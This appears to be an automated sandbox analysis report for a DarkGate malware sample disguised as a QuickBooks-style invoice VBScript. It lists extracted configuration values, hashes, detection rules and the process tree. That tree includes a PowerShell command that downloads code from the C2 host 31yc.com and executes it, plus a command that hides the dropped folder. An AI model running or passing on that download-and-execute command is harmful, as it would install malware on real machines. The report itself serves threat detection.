Analysis
-
max time kernel
143s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
02-04-2024 16:02
Static task
static1
Behavioral task
behavioral1
Sample
QB-04_02_24_inv765541BA.vbs
Resource
win7-20240221-en
General
-
Target
QB-04_02_24_inv765541BA.vbs
-
Size
8KB
-
MD5
29552b793e8d97538afff1aaf566a625
-
SHA1
e3931fca0386f00e1c246039c3491b686e5d8354
-
SHA256
5cb9876681f78d3ee8a01a5aaa5d38b05ec81edc48b09e3865b75c49a2187831
-
SHA512
a847bcc585e75118920548bce0ab85cc4f9f3305052dc835a2cdf7ec127982e7d2e94519505c73c429709665b231ba259477f5efe468815ea1c237edd247f2f6
-
SSDEEP
192:YMg119gkCtL3IqSPN3QzGNzUoNJnN/Y99957:jy19gR3IquNgzG2oNl4
Malware Config
Extracted
darkgate
admin888
31yc.com
-
anti_analysis
true
-
anti_debug
false
-
anti_vm
true
-
c2_port
80
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
xIpQnKfo
-
minimum_disk
50
-
minimum_ram
4000
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
admin888
Signatures
-
Detect DarkGate stealer 2 IoCs
resource yara_rule behavioral2/memory/2192-42-0x0000000002820000-0x0000000002893000-memory.dmp family_darkgate_v6 behavioral2/memory/2192-45-0x0000000002820000-0x0000000002893000-memory.dmp family_darkgate_v6 -
Blocklisted process makes network request 4 IoCs
flow pid Process 8 3580 powershell.exe 10 3580 powershell.exe 19 3580 powershell.exe 21 3580 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 2192 KeyScramblerLogon.exe -
Loads dropped DLL 2 IoCs
pid Process 2192 KeyScramblerLogon.exe 2192 KeyScramblerLogon.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 KeyScramblerLogon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString KeyScramblerLogon.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3580 powershell.exe 3580 powershell.exe 2192 KeyScramblerLogon.exe 2192 KeyScramblerLogon.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3580 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 4708 wrote to memory of 3580 4708 WScript.exe 93 PID 4708 wrote to memory of 3580 4708 WScript.exe 93 PID 3580 wrote to memory of 2192 3580 powershell.exe 103 PID 3580 wrote to memory of 2192 3580 powershell.exe 103 PID 3580 wrote to memory of 2192 3580 powershell.exe 103 PID 3580 wrote to memory of 884 3580 powershell.exe 104 PID 3580 wrote to memory of 884 3580 powershell.exe 104 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 884 attrib.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\QB-04_02_24_inv765541BA.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri '31yc.com/sjcgwjvm')2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\tket\KeyScramblerLogon.exe"C:\tket\KeyScramblerLogon.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2192
-
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/tket/3⤵
- Views/modifies file attributes
PID:884
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4160 --field-trial-handle=2236,i,5367110156796017614,12594004256180761011,262144 --variations-seed-version /prefetch:81⤵PID:3228
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
704KB
MD5663e2ab731eed87f5e26fbd057490abb
SHA15a81a315eeecac7c6c0878e9207e550e7c45f169
SHA25645793173506de756408a577835d90161a0720c5fe2242f791bcef190556af796
SHA512027a0da4826e8d858519c65c83896a11569aa8327ddd257fa8fca0fc07b474c98b1ea34c76e6c2a0018b5121fd40bdb6d092d0be7afa37b826066cdd26bfa49b
-
Filesize
500KB
MD5c790ebfcb6a34953a371e32c9174fe46
SHA13ead08d8bbdb3afd851877cb50507b77ae18a4d8
SHA256fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1
SHA51274e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554
-
Filesize
457KB
MD553feeff1344bc6c48eddbc4fec8be3a7
SHA1ac4b206b30a3a69a5f77122433fdc255f903e36e
SHA256d7bba151c501ecb9a936cf1ab64620cafbd2284773e73d8390f9d0d3b73a98fa
SHA5127bae83045a7f0a541e4b9e66a5d5ff080b9ef0c00f165092a8f88e450caafe29442619c04b537fcd4e7105554aabeabda135727c1c1e1a2b001b5e0a13484f6b